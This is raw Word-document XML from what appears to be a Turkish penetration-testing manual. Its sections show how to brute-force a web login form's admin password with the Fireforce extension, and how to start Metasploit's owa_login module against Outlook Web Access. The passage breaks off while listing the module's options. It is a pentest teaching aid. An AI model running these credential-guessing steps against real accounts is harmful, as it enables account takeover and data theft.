    <w:p w14:paraId="1A7D0645" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="49664CFF" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="74A4BADC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="6EA17D29" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="444B75D2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="1DF3D0BC" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="2D9B6ECD" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F"/>
    <w:p w14:paraId="3EF67248" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc430104863"/>
      <w:r>
        <w:t xml:space="preserve">5.8. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:t>Fireforce Kullanarak Hedefe Yönelik Kaba Kuvvet Saldırısı Yapma</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0F8B1CC2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DB07D4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Eklentinin kurulması</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8498C" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="409249F9" wp14:editId="472C9A64">
            <wp:extent cx="5760720" cy="3030819"/>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0819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA7186" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A210A7" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.Adım: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kaba kuvvet saldırısı yapılacak form alanına sağ tıklanarak ister dosyadan yükleme yapılabilir istenilirse desteklediği karakter aralıkları (a-z,A-Z,a-z0-9,0-9 v.b) ile belirtilecek boyutta word listler(kelime listeleri) ile kaba kuvvet saldırısı yapılabilir. Aşağıda admin kullanıcısı için sözlükten yükleyerek parolası kırılmaya çalışılacaktır;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58658A84" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="152BCC5E" wp14:editId="4C4BE40D">
            <wp:extent cx="5760720" cy="2952731"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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52731"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FDE77" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26866661" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D126757" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcıdan hata anında web sunucunun döneceği hata, aşağıdaki gibi sorulacaktır;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16132EC1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16789F84" wp14:editId="2C8C47CC">
            <wp:extent cx="3096895" cy="2441575"/>
            <wp:effectExtent l="0" t="0" r="825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2441575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F553CA" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769C56A1" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bir kereye mahsus yanlış kullanıcı adı ve şifre girilerek web sunucunun döneceği hata mesajı alınır;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B44E34" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CAB2378" wp14:editId="6C7C7B92">
            <wp:extent cx="5760720" cy="1075928"/>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075928"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E291A80" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79EA72C5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Görüldüğü gibi </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Invalid login! </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>şeklinde bir hata mesajı dönüldü.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241DA57" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E9D8D17" wp14:editId="7D3AB1B3">
            <wp:extent cx="3096895" cy="2441575"/>
            <wp:effectExtent l="0" t="0" r="8255"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895" cy="2441575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23620F4D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F1D2B2" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Saniyedeki istek sayısı da girildikten sonra </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">save </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>denilerek saldırı başlatılır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2CA258" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FC01417" wp14:editId="16CF9E22">
            <wp:extent cx="3959225" cy="2475865"/>
            <wp:effectExtent l="0" t="0" r="3175" b="63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225" cy="2475865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5D0634" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C3B2A8" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ek Kaynaklar: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA9D8F4" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId33" w:history="1">
        <w:r w:rsidRPr="00B3628B">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://www.networkpentest.net/2012/04/burp-proxy-ile-web-uygulamalarnda-login.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DF507A5" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00902B70" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C331A48" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc430104864"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:t xml:space="preserve"> Owa Hesaplarına Bruteforce Denemeleri</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="4F843816" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E688E9E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Açıklama:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microsoft OWA(Outlook Web Access) kurumsal ortamlarda en fazla tercih edilen webmail uygulaması olarak karşımıza çıkmaktadır. Günümüz iş dünyasının en temel iletişim araçlarından birinin e-posta(mail) olduğu düşünülürse dışarı açık OWA sistemlerinin büyük risk taşıdığı söylenebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C340915" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ele geçirilecek bir mail hesabı sadece sahibinin güvenliğini değil şirketin güvenliğini de tehlikeye atmaktadır. Basit mantıkla düşünülecek olursa ele geçirilmiş bir mail hesabı  üzerinden hem sosyal mühendislik saldırıları hem de şirket çalışanlarının tüm özlük bilgileri </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sızdırılabilir</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D419E" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu nedenle pentest çalışmalarında e-posta hesaplarının tahmin yöntemiyle ele geçirilmesi adımı önemli rol oynamaktadır.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DB462F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Internet üzerinden indirilecek çoğu "brute force" yazılımı yeni nesil OWA sürümlerini desteklememekte ya da stabil çalışmamaktadır. Metasploit Aux modüllerine eklenen güncel modül -</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>owa_login</w:t>
      </w:r>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>- kullanılabilir en sağlam hesap deneme yazılımı olarak gözükmektedir. OWA brute force aux modülü kullanılarak OWA 2003, 2007, 2010 ve 2012 sürümlerine yönelik brute force çalışmaları gerçekleştirilebilmektedir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68202F3F" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00053A9F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3628B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Uygulama: </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TabloKlavuzu"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9062"/>
      </w:tblGrid>
      <w:tr w:rsidR="00053A9F" w:rsidRPr="00B3628B" w14:paraId="581584A5" w14:textId="77777777" w:rsidTr="00F069F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9062" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="35C16A3D" w14:textId="77777777" w:rsidR="00053A9F" w:rsidRPr="00B3628B" w:rsidRDefault="00053A9F" w:rsidP="00F069F7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>root@bt:/pentest/exploits/framework3# ./msfconsole</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>=[ metasploit v4.2.0-dev [core:4.2 api:1.0]</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>+ -- --=[ 768 exploits - 406 auxiliary - 119 post</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>+ -- --=[ 228 payloads - 27 encoders - 8 nops</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>=[ svn r14338 updated 15 days ago (2011.12.02)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf &gt; search owa</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Matching Modules</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>================</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Name Disclosure Date Rank Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>---- --------------- ---- -----------</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>auxiliary/scanner/http/owa_login normal Outlook Web App (OWA) Brute Force Utility</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf &gt; use auxiliary/scanner/http/owa_login</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>msf auxiliary(owa_login) &gt; show options</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Module options (auxiliary/scanner/http/owa_login):</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
              <w:t>Name Current Setting Required Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>---- --------------- -------- -----------</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>PASSWORD no A specific password to authenticate with</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>PASS_FILE no File containing passwords, one per line</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Proxies no Use a proxy chain</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>RHOST yes The target address</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>RPORT 443 yes The target port</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host</w:t>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B3628B">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="24"/>
              </w:rPr>
